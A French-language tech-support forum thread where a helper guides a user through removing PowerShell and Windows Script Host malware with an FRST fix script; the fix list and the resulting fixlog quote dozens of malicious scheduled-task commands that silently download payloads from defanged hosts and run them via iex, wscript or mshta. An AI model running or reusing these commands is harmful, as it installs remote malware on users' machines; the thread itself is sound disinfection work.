Trojan:Script/SuspDown.SZ, Trojan:JS/Cryxos.NAQ!MTB[ et Virus PowerShell/Wscript et fenêtres qui s'ouvrent

[maison88]

Bonjour,

Je sollicite votre aide pour supprimer les nombreux malwares qui infectent mon ordinateur depuis très longtemps. Cela est devenu insupportable dernièrement quand plusieurs fenêtres d'erreurs en cascade s'affichent.

Toute la soirée j'ai lancé plusieurs scans avec Malwarebytes, Eset Online Scanner, RogueKiller et Kaspersky Removal Tool, tous ces outils ont permis de trouver des dizaines de trojans et autres logiciels malveillants. C'est déjà un bon début pour nettoyer le PC mais il en resterait encore.

Il semble que je sois aussi infecté par le virus Powershell qui ouvre une fenête bleue très régulièrement, bloqué par Malwarebytes mais réapparaît toujours plus tard.

Merci d'avance.

Addition.txt

FRST.txt

Shortcut.txt

[Malekal_morte]

Salut,

En effet, ton PC est infecté par de multiples virus PowerShell et Windows Script Hosting.
Windows Defender détecte quelques malwares.

Date: 2025-05-11 19:20:01
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
Name: Trojan:Script/SuspDown.SZ
Severity: Severe
Category: Trojan
Path: amsi:_\Device\HarddiskVolume4\Windows\System32\mshta.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: AMSI
Process Name: C:\Windows\System32\mshta.exe
Security intelligence Version: AV: 1.427.739.0, AS: 1.427.739.0, NIS: 1.427.739.0
Engine Version: AM: 1.1.25030.1, NIS: 1.1.25030.1

Date: 2025-05-11 19:17:42
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
Name: Trojan:JS/Cryxos.NAQ!MTB
Severity: Severe
Category: Trojan
Path: amsi:_C:\Users\Public\Downloads\oraches.js
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: AMSI
Process Name: C:\Windows\System32\wscript.exe
Security intelligence Version: AV: 1.427.739.0, AS: 1.427.739.0, NIS: 1.427.739.0
Engine Version: AM: 1.1.25030.1, NIS: 1.1.25030.1

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\isuspm.exe [2075480 2013-06-24] (Flexera Software LLC -> Flexera Software LLC.)
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\...\RunOnce: [266e3ae4-8acb-40b1-864a-f0ee678da9bd] => "C:\Users\relaisdupre\AppData\Local\Temp\{e36b1125-8ef0-4fe0-8ab6-ac33fb562ad8}\266e3ae4-8acb-40b1-864a-f0ee678da9bd.cmd" (Pas de fichier) <==== ATTENTION
Task: {AAD3DEC6-C81F-4FBD-9C76-AA8C41F5BE3E} - System32\Tasks\AdobeBooking'1 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\Booking.ps1 <==== ATTENTION
Task: {E8AC4FDE-8618-49DA-96CA-FF8C4426B857} - System32\Tasks\AdobeReaderDC'1 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\DataWindows.ps1 <==== ATTENTION
Task: {66449A3C-238D-42C6-9A52-71E337132D6D} - System32\Tasks\ARNOCCVV02 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\CU.ps1 <==== ATTENTION
Task: {6E35887B-609A-440C-BBBD-69A1DFAE9874} - System32\Tasks\AudioHD32 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex; <==== ATTENTION
Task: {4C43BF9C-D61D-4D1C-BA21-D142E23E7B8E} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2564904 2024-11-20] (Avast Software s.r.o. -> Gen Digital Inc.)
Task: {E957D343-708E-47C8-8EB9-20F43DD0A352} - System32\Tasks\Booking2024 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\Atendimento.ps1 <==== ATTENTION
Task: {45B7A095-B762-4E08-B462-A8CDAAF1D571} - System32\Tasks\BookingAgente => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\BookingAgente.ps1 <==== ATTENTION
Task: {40A84849-62E2-4EC9-8432-97A9E4CF8152} - System32\Tasks\BookingData => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/bookingfinal.jpg"" -useB|iex; <==== ATTENTION
Task: {C57ECFFD-5417-4A20-8669-65695984A784} - System32\Tasks\carbonite => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://passagem-aviao.com/bkp/' -OutFile 'C:\Users\Public\Downloads\oraches.js'; Start-Process 'C:\Users\Public\Downloads\oraches.js'" <==== ATTENTION
Task: {D14A5F09-097D-47E9-8F98-41E4626426D3} - System32\Tasks\CClean_Data => C:\Windows\system32\mshta.exe [43520 2025-04-27] (Microsoft Windows -> Microsoft Corporation) -> hxxps://webnar.info/taskbooking.html
Task: {40191676-3FA5-4E9F-9F56-DDC97C9F03E2} - System32\Tasks\CcleanUpdata23 => C:\Windows\system32\mshta.exe [43520 2025-04-27] (Microsoft Windows -> Microsoft Corporation) -> hxxps://skynetx.com.br/tarefa.html
Task: {A8CECACF-A588-48C0-9BF9-E49EAD29DD7E} - System32\Tasks\CCVVTOOLS => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\tools.ps1 <==== ATTENTION
Task: {BFF4187F-1E8D-462A-A02F-28A4575019F7} - System32\Tasks\fleer => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxp://saddlebrown-hyena-989303.com/bkp' -OutFile 'C:\Users\Public\Downloads\polyadelphian.js'; Start-Process 'C:\Users\Public\Downloads\polyadelphian.js'" <==== ATTENTION
Task: {44A4D8A3-2A57-4F64-B22A-C593A3A0F2D3} - System32\Tasks\generator => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://floricuturas.com/bkp' -OutFile 'C:\Users\Public\Downloads\phrenologer.js'; Start-Process 'C:\Users\Public\Downloads\phrenologer.js'" <==== ATTENTION
Task: {E995BEA3-2EEC-4F6D-BB1A-42BAEE0270E1} - System32\Tasks\glycerogelatin => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://grooove.news/bkp' -OutFile 'C:\Users\Public\Downloads\separatistic.js'; Start-Process 'C:\Users\Public\Downloads\separatistic.js'" <==== ATTENTION
Task: {A49D5946-A2E1-4B89-8952-66F1444914D4} - System32\Tasks\HDAudio => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex; <==== ATTENTION
Task: {F4338805-2D2E-4D28-B786-A6E60840F38D} - System32\Tasks\LocomotivaCDT => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min powershell -sta -noProfile -NonInteractive -nologo -command C:\Users\Public\CDT.ps1 <==== ATTENTION
Task: {52DF0E51-22ED-407C-AF06-64052EDEF201} - System32\Tasks\monodomains => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://grooove.news/' -OutFile 'C:\Users\Public\Downloads\acetylspermine.js'; Start-Process 'C:\Users\Public\Downloads\acetylspermine.js'" <==== ATTENTION
Task: {64DC7155-7E05-4000-867C-76917E1344A9} - System32\Tasks\Mozilla\Firefox Background Update S-1-5-21-552949202-3956616510-728353980-1001 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe [695360 2025-05-01] (Mozilla Corporation -> Mozilla Corporation) -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\--MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask background (l'élément de données a 6 caractères en plus).
Task: {23561EE3-2ABF-4D96-98ED-A3F1314536F5} - System32\Tasks\myrmecophilous => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://passagem-aviao.com/bkp/' -OutFile 'C:\Users\Public\Downloads\oleochemistry.js'; Start-Process 'C:\Users\Public\Downloads\oleochemistry.js'" <==== ATTENTION
Task: {8831E937-08FD-43D3-9A44-C85E5C9A7B20} - System32\Tasks\nicolo => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxp://saddlebrown-hyena-989303.com/bkp' -OutFile 'C:\Users\Public\Downloads\Troest.js'; Start-Process 'C:\Users\Public\Downloads\Troest.js'" <==== ATTENTION
Task: {F93139ED-4E86-4382-9276-6AF8929A20C4} - System32\Tasks\obstetricious => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://flytoucorporate.com/bkp_xworm' -OutFile 'C:\Users\Public\Downloads\protometabolism.js'; Start-Process 'C:\Users\Public\Downloads\protometabolism.js'" <==== ATTENTION
Task: {EFA064A3-DCFA-466D-A53D-44828F414BE5} - System32\Tasks\RegisterDevicePeriodic36 => C:\Windows\system32\mshta.exe [43520 2025-04-27] (Microsoft Windows -> Microsoft Corporation) -> "hxxps://skynetx.com.br/helper.html"
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\Users\relaisdupre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lavasoft
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\Users\relaisdupre\AppData\Roaming\Lavasoft
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\Users\relaisdupre\AppData\Local\Lavasoft
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\ProgramData\Lavasoft
reg: reg delete HKLM\SOFTWARE\Policies /f
reg: reg delete HKCU\SOFTWARE\Policies /f
reg: reg add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v Enabled /d 0 /f
reg: reg add "HKCU\Software\Microsoft\Windows Script Host\Settings" /v Enabled /d 0 /f
RemoveProxy:
Reboot:
End:

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)



2) réinitialiser les navigateurs:
==================================
Réinitialise tes navigateurs et/ou re-paramètre manuellement tes navigateurs WEB ( page de démarrage, moteur de recherche, etc ) mais aussi supprimer/désactiver les extensions inutiles/parasites.
Pour t'aider à effectuer ce ménage, clique ci-dessous sur le nom du navigateur WEB que tu utilises :

• Réparer Mozilla Firefox (premier paragraphe)
• Réparer Google Chrome (premier paragraphe)
• Comment réparer ou réinitialiser Microsoft Edge

3) Désinstalle CCleaner, inutile, encombre et ralentit le PC.

4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint

[maison88]

Merci de votre réponse.

Les fenêtres intempestives ont déjà disparu, probablement avec le nettoyage par Kaspersky Tool fait hier soir.

Voici les nouveaux rapports.

https://pjjoint.malekal.com/files.php?i ... 0z15w7i6n8
https://pjjoint.malekal.com/files.php?i ... 8i7x5z9v14
https://pjjoint.malekal.com/files.php?i ... o6y13g6i15

[Parisien_entraide]

Bonsoir

Ce qui est demandé c'est le rapport du fix, pas de prendre des initiatives tant que tu es en analyse (Tu as passé Adwcleaner également a priori. Ce qui est totalement inutile pour ton cas)
Par la suite tu feras ce que tu veux

[maison88]

Bonjour,

En fait je ne m'y connais pas trop, j'ai juste suivi les tutoriels du site en installant les logiciels conseillés, et à la fin j'ai décidé de passer un scan FRST.

Pour le fixlog le voici.

Code : Tout sélectionner

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 09-05-2025
Exécuté par relaisdupre (12-05-2025 18:22:48) Run:1
Exécuté depuis C:\Users\relaisdupre\Desktop
Profils chargés: relaisdupre
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Start:
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\isuspm.exe [2075480 2013-06-24] (Flexera Software LLC -> Flexera Software LLC.)
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\...\RunOnce: [266e3ae4-8acb-40b1-864a-f0ee678da9bd] => "C:\Users\relaisdupre\AppData\Local\Temp\{e36b1125-8ef0-4fe0-8ab6-ac33fb562ad8}\266e3ae4-8acb-40b1-864a-f0ee678da9bd.cmd" (Pas de fichier) <==== ATTENTION
Task: {AAD3DEC6-C81F-4FBD-9C76-AA8C41F5BE3E} - System32\Tasks\AdobeBooking'1 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\Booking.ps1 <==== ATTENTION
Task: {E8AC4FDE-8618-49DA-96CA-FF8C4426B857} - System32\Tasks\AdobeReaderDC'1 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\DataWindows.ps1 <==== ATTENTION
Task: {66449A3C-238D-42C6-9A52-71E337132D6D} - System32\Tasks\ARNOCCVV02 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\CU.ps1 <==== ATTENTION
Task: {6E35887B-609A-440C-BBBD-69A1DFAE9874} - System32\Tasks\AudioHD32 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex; <==== ATTENTION
Task: {4C43BF9C-D61D-4D1C-BA21-D142E23E7B8E} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2564904 2024-11-20] (Avast Software s.r.o. -> Gen Digital Inc.)
Task: {E957D343-708E-47C8-8EB9-20F43DD0A352} - System32\Tasks\Booking2024 => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\Atendimento.ps1 <==== ATTENTION
Task: {45B7A095-B762-4E08-B462-A8CDAAF1D571} - System32\Tasks\BookingAgente => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\BookingAgente.ps1 <==== ATTENTION
Task: {40A84849-62E2-4EC9-8432-97A9E4CF8152} - System32\Tasks\BookingData => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/bookingfinal.jpg"" -useB|iex; <==== ATTENTION
Task: {C57ECFFD-5417-4A20-8669-65695984A784} - System32\Tasks\carbonite => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://passagem-aviao.com/bkp/' -OutFile 'C:\Users\Public\Downloads\oraches.js'; Start-Process 'C:\Users\Public\Downloads\oraches.js'" <==== ATTENTION
Task: {D14A5F09-097D-47E9-8F98-41E4626426D3} - System32\Tasks\CClean_Data => C:\Windows\system32\mshta.exe [43520 2025-04-27] (Microsoft Windows -> Microsoft Corporation) -> hxxps://webnar.info/taskbooking.html
Task: {40191676-3FA5-4E9F-9F56-DDC97C9F03E2} - System32\Tasks\CcleanUpdata23 => C:\Windows\system32\mshta.exe [43520 2025-04-27] (Microsoft Windows -> Microsoft Corporation) -> hxxps://skynetx.com.br/tarefa.html
Task: {A8CECACF-A588-48C0-9BF9-E49EAD29DD7E} - System32\Tasks\CCVVTOOLS => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min PowerShell -ex Bypass C:\Users\Public\tools.ps1 <==== ATTENTION
Task: {BFF4187F-1E8D-462A-A02F-28A4575019F7} - System32\Tasks\fleer => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxp://saddlebrown-hyena-989303.com/bkp' -OutFile 'C:\Users\Public\Downloads\polyadelphian.js'; Start-Process 'C:\Users\Public\Downloads\polyadelphian.js'" <==== ATTENTION
Task: {44A4D8A3-2A57-4F64-B22A-C593A3A0F2D3} - System32\Tasks\generator => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://floricuturas.com/bkp' -OutFile 'C:\Users\Public\Downloads\phrenologer.js'; Start-Process 'C:\Users\Public\Downloads\phrenologer.js'" <==== ATTENTION
Task: {E995BEA3-2EEC-4F6D-BB1A-42BAEE0270E1} - System32\Tasks\glycerogelatin => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://grooove.news/bkp' -OutFile 'C:\Users\Public\Downloads\separatistic.js'; Start-Process 'C:\Users\Public\Downloads\separatistic.js'" <==== ATTENTION
Task: {A49D5946-A2E1-4B89-8952-66F1444914D4} - System32\Tasks\HDAudio => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex; <==== ATTENTION
Task: {F4338805-2D2E-4D28-B786-A6E60840F38D} - System32\Tasks\LocomotivaCDT => C:\Windows\system32\cmd.exe [289792 2024-05-17] (Microsoft Windows -> Microsoft Corporation) -> /c start /min powershell -sta -noProfile -NonInteractive -nologo -command C:\Users\Public\CDT.ps1 <==== ATTENTION
Task: {52DF0E51-22ED-407C-AF06-64052EDEF201} - System32\Tasks\monodomains => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://grooove.news/' -OutFile 'C:\Users\Public\Downloads\acetylspermine.js'; Start-Process 'C:\Users\Public\Downloads\acetylspermine.js'" <==== ATTENTION
Task: {64DC7155-7E05-4000-867C-76917E1344A9} - System32\Tasks\Mozilla\Firefox Background Update S-1-5-21-552949202-3956616510-728353980-1001 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe [695360 2025-05-01] (Mozilla Corporation -> Mozilla Corporation) -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\--MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask background (l'élément de données a 6 caractères en plus).
Task: {23561EE3-2ABF-4D96-98ED-A3F1314536F5} - System32\Tasks\myrmecophilous => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://passagem-aviao.com/bkp/' -OutFile 'C:\Users\Public\Downloads\oleochemistry.js'; Start-Process 'C:\Users\Public\Downloads\oleochemistry.js'" <==== ATTENTION
Task: {8831E937-08FD-43D3-9A44-C85E5C9A7B20} - System32\Tasks\nicolo => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxp://saddlebrown-hyena-989303.com/bkp' -OutFile 'C:\Users\Public\Downloads\Troest.js'; Start-Process 'C:\Users\Public\Downloads\Troest.js'" <==== ATTENTION
Task: {F93139ED-4E86-4382-9276-6AF8929A20C4} - System32\Tasks\obstetricious => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-26] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://flytoucorporate.com/bkp_xworm' -OutFile 'C:\Users\Public\Downloads\protometabolism.js'; Start-Process 'C:\Users\Public\Downloads\protometabolism.js'" <==== ATTENTION
Task: {EFA064A3-DCFA-466D-A53D-44828F414BE5} - System32\Tasks\RegisterDevicePeriodic36 => C:\Windows\system32\mshta.exe [43520 2025-04-27] (Microsoft Windows -> Microsoft Corporation) -> "hxxps://skynetx.com.br/helper.html"
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\Users\relaisdupre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lavasoft
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\Users\relaisdupre\AppData\Roaming\Lavasoft
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\Users\relaisdupre\AppData\Local\Lavasoft
2025-05-11 07:00 - 2024-05-25 11:14 - 000000000 ____D C:\ProgramData\Lavasoft
reg: reg delete HKLM\SOFTWARE\Policies /f
reg: reg delete HKCU\SOFTWARE\Policies /f
reg: reg add "HKLM\Software\Microsoft\Windows Script Host\Settings" /v Enabled /d 0 /f
reg: reg add "HKCU\Software\Microsoft\Windows Script Host\Settings" /v Enabled /d 0 /f
RemoveProxy:
Reboot:
End:̩
*****************

Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ISUSPM" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiSpyware"="0" => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiVirus"="0" => valeur restauré(es) avec succès
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\266e3ae4-8acb-40b1-864a-f0ee678da9bd" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AAD3DEC6-C81F-4FBD-9C76-AA8C41F5BE3E}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AAD3DEC6-C81F-4FBD-9C76-AA8C41F5BE3E}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\AdobeBooking'1 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeBooking'1" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E8AC4FDE-8618-49DA-96CA-FF8C4426B857}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E8AC4FDE-8618-49DA-96CA-FF8C4426B857}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\AdobeReaderDC'1 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeReaderDC'1" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{66449A3C-238D-42C6-9A52-71E337132D6D}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66449A3C-238D-42C6-9A52-71E337132D6D}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ARNOCCVV02 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ARNOCCVV02" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E35887B-609A-440C-BBBD-69A1DFAE9874}" => non trouvé(e)
"C:\Windows\System32\Tasks\AudioHD32" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AudioHD32" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{4C43BF9C-D61D-4D1C-BA21-D142E23E7B8E}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4C43BF9C-D61D-4D1C-BA21-D142E23E7B8E}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Avast Software\Overseer => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Avast Software\Overseer" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E957D343-708E-47C8-8EB9-20F43DD0A352}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E957D343-708E-47C8-8EB9-20F43DD0A352}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Booking2024 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Booking2024" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{45B7A095-B762-4E08-B462-A8CDAAF1D571}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{45B7A095-B762-4E08-B462-A8CDAAF1D571}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\BookingAgente => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BookingAgente" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{40A84849-62E2-4EC9-8432-97A9E4CF8152}" => non trouvé(e)
"C:\Windows\System32\Tasks\BookingData" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BookingData" => non trouvé(e)
